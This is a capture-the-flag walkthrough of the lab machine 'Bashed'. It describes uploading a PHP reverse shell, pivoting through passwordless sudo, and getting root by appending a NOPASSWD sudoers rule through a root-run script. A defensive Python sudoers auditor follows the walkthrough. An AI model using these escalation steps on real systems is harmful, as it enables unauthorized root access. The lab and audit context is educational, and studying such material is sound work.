Name | Bashed |
---|---|
IP | 10.10.10.68 |
OS | Linux |
Points | Easy(20) |
recon
Web
http://10.10.10.68/dev/phpbash.php
We need a php-reverse-shell.php to be uploaded
Let's upload it to the /uploads dir and go there from the browser while you're listening with nc :D
BOOM We got a shell as www-data xD
sudo -l
We can run /bin/bash as user scriptmanager without any password on the box
sudo -u scriptmanager /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
cat /home/arrexel/user.txt
We got our shell as scriptmanager and we have the user.txt btw
Linpeas
/scripts/test.txt
That's a weird dir lul
Gettin root
cd /scripts
vi /scripts/test.py
now the full key combo on this shit terminal like a REAL blind vim elitist:
Go
os.system('echo "scriptmanager ALL=NOPASSWD: /bin/bash" >> /etc/sudoers')
<ctrl+v><esc>:wq
I meant <shift>+g (go to the last line of the file) -> o (make a new line) -> <ctrl>+v (paste the cmd u want) -> <escape> (gettin into normal mode) -> :wq (command mode save and quit)
Wait 1 min and run sudo /bin/bash
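Both hops on this box come down to passwordless sudo rules that hand out a shell, so here is a defender-side audit for that (an added example, not part of the original writeup). It is a simplified single-line sudoers parser that ignores aliases and includes; the `SHELLS` list and the sample lines are constructed for illustration, except the last sample line, which is the one appended above.

```python
import re

# Binaries that give the caller a shell or interpreter (illustrative, not exhaustive).
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/python", "/usr/bin/python3"}

# who host = [(runas)] [TAG:] cmd[, [TAG:] cmd ...]   (single-line user specs only)
SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*")

def audit_sudoers(text):
    """Return (line_no, who, runas, command) for each passwordless rule granting a shell or ALL."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").strip()  # no runas spec means root
        nopasswd = False
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            # A tag applies to its command and carries over to the ones after it.
            while (t := TAG.match(cmd)):
                if t.group(1) == "NOPASSWD":
                    nopasswd = True
                elif t.group(1) == "PASSWD":
                    nopasswd = False
                cmd = cmd[t.end():]
            binary = cmd.split()[0] if cmd else ""
            if nopasswd and (binary == "ALL" or binary in SHELLS):
                findings.append((no, m.group("who"), runas, binary))
    return findings

# Constructed sample; only the last line is taken from the writeup.
SAMPLE = """\
# constructed sample sudoers content
Defaults env_reset
root ALL=(ALL:ALL) ALL
www-data ALL=(scriptmanager) NOPASSWD: /bin/bash
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, PASSWD: /bin/bash
scriptmanager ALL=NOPASSWD: /bin/bash
"""

if __name__ == "__main__":
    for no, who, runas, cmd in audit_sudoers(SAMPLE):
        print(f"line {no}: {who} may run {cmd} as {runas} without a password")
```

Running it against a copy of /etc/sudoers before and after a suspected compromise shows any newly appended rule as an extra finding.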